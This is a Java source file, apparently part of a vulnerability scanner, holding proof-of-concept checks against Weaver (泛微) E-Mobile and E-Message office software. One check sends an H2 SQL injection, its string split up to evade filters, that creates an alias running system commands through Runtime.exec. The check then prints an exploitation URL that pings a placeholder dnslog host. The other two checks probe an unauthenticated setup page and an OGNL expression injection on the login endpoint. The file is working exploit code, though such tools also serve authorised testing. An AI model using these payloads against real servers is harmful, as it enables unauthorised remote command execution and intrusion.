package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

import java.net.MalformedURLException;

@BasicMapping(uri ="泛微OA E-Mobile/E-Message")
public class WeaverEMoblieController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description = "泛微 E-Mobile H2 数据库SQL注入",SupportVulType = SupportVul.RuntimeExec)
    public void vul_messageTypeH2Injection(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Mobile H2 数据库SQL注入");
        String random = Utils.getRandomString(4);
        String url = "/messageType.do?method=create&typeName=2';CREATE%20ALIAS%20cc8x%20AS%20CONCAT('void%20e(String%20cmd)%20throws%20java.io.IOException{','java.lan','g.Run','time%20rt=java.la','ng.Ru','ntime.getRu','ntime();rt.ex','ec(cmd);}');--";
        switch (type){
            case EXP:
                break;
            case POC:
                url =url.replace("cc8x",random);
                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 && result.responseBody.contains("true")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 漏洞利用：/messageType.do?method=create&typeName=2%27;CALL%20"+random+"(%27ping+xxx.dnslog.com%27);--+" );
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                    WriteLog("\n[*] "+result.responseBody);

                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微 E-Message 权限绕过",SupportVulType = SupportVul.RuntimeExec)
    public void vul_BypassLogin(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微 E-Message 权限绕过");
        String random = Utils.getRandomString(4);
        String url = "/setup/setup-datasource-standard.jsp";
        switch (type){
            case EXP:
                break;
            case POC:

                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 漏洞利用：" +target+url);
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                    WriteLog("\n[*] "+result.responseBody);

                }
                //WriteLog("\n"+result.responseBody);
        }
    }
     @VulnerabilityDescriptionMapping(Description = "泛微_e_mobile_ogbl_表达式注入",SupportVulType = SupportVul.RuntimeExec)
    public void vul_ogbl(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微_e_mobile_ogbl_表达式注入");
//        String random = Utils.getRandomString(4);
        String url = "/login.do?message=1025*3412";
        switch (type){
            case EXP:
                break;
            case POC:
//                url =url.replace("cc8x",random);
                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 && result.responseBody.contains("3497300")){
                    WriteLog("\n[*] 存在漏洞");
//                    WriteLog("\n[*] 漏洞利用：/messageType.do?method=create&typeName=2%27;CALL%20"+random+"(%27ping+xxx.dnslog.com%27);--+" );
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                    WriteLog("\n[*] "+result.responseBody);

                }
                //WriteLog("\n"+result.responseBody);
        }
    }
}
